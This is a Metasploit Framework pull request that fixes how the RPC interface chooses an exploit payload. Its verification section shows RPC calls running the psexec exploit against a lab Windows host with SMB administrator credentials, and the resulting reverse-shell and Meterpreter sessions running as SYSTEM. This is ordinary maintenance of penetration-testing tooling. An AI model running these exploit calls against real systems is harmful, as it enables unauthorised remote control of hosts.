### PR TITLE
Fix broken payload selection for metasploit rpc

### DIFF
--- a/lib/msf/core/rpc/v10/rpc_module.rb
+++ b/lib/msf/core/rpc/v10/rpc_module.rb
@@ -737,9 +737,7 @@ private
   end
 
   def _run_exploit(mod, opts)
-    if mod.datastore['PAYLOAD']
-      opts['PAYLOAD'] = mod.datastore['PAYLOAD']
-    else
+    if opts['PAYLOAD'].blank?
       opts['PAYLOAD'] = Msf::Payload.choose_payload(mod)
     end
 


### PR DESCRIPTION
Relates to https://github.com/rapid7/metasploit-framework/issues/17649
Relates to https://github.com/rapid7/metasploit-framework/issues/17677
Continuation of https://github.com/rapid7/metasploit-framework/pull/17305

Fix broken payload selection for Metasploit RPC 

## Verification

Create an RPC server:

```
ruby msfrpcd -U user -P pass -f
```

Connect a client:

```
ruby msfrpc -U user -P pass -a 127.0.0.1
```

Run the metasploit module with a payload specified, verify a valid session:
```ruby
>> rpc.call('module.execute', 'exploit', 'exploit/windows/smb/psexec', {"RHOSTS" => "192.168.123.13", "TARGET" => 2, "PAYLOAD" => "windows/shell/reverse_tcp", "LHOST" => "192.168.123.1", "L
PORT" => 5000,  "SMBUSER" => "Administrator", "SMBPASS" => "p4$$w0rd"})
=> {"job_id"=>0, "uuid"=>"hhnm8ixl"}
>> rpc.call('session.list')
=> 
{1=>
  {"type"=>"shell",
   "tunnel_local"=>"192.168.123.1:5000",
   "tunnel_peer"=>"192.168.123.13:60896",
   "via_exploit"=>"exploit/windows/smb/psexec",
   "via_payload"=>"payload/windows/shell/reverse_tcp", <------------
   "desc"=>"Command shell",
   "info"=>"",
   "workspace"=>"false",
   "session_host"=>"192.168.123.13",
   "session_port"=>445,
   "target_host"=>"192.168.123.13",
   "username"=>"adfoster",
   "uuid"=>"wwh9s2ac",
   "exploit_uuid"=>"hhnm8ixl",
   "routes"=>"",
   "arch"=>""}}

```

Run the metasploit module without a payload specified, verify a valid session:


```ruby
>> rpc.call('module.execute', 'exploit', 'exploit/windows/smb/psexec', {"RHOSTS" => "192.168.123.13", "LHOST" => "192.168.123.1", "LPORT" => 5000,  "SMBUSER" => "Administrator", "SMBPASS" =
> "p4$$w0rd"})
=> {"job_id"=>1, "uuid"=>"xskffj25"}
>> rpc.call('session.list')
=> 
{2=>
  {"type"=>"meterpreter",
   "tunnel_local"=>"192.168.123.1:5000",
   "tunnel_peer"=>"192.168.123.13:60897",
   "via_exploit"=>"exploit/windows/smb/psexec",
   "via_payload"=>"payload/windows/meterpreter/reverse_tcp", <---------
   "desc"=>"Meterpreter",
   "info"=>"NT AUTHORITY\\SYSTEM @ DC3",
   "workspace"=>"false",
   "session_host"=>"192.168.123.13",
   "session_port"=>445,
   "target_host"=>"192.168.123.13",
   "username"=>"adfoster",
   "uuid"=>"ltol2fib",
   "exploit_uuid"=>"xskffj25",
   "routes"=>"",
   "arch"=>"x86",
   "platform"=>"windows"}}
```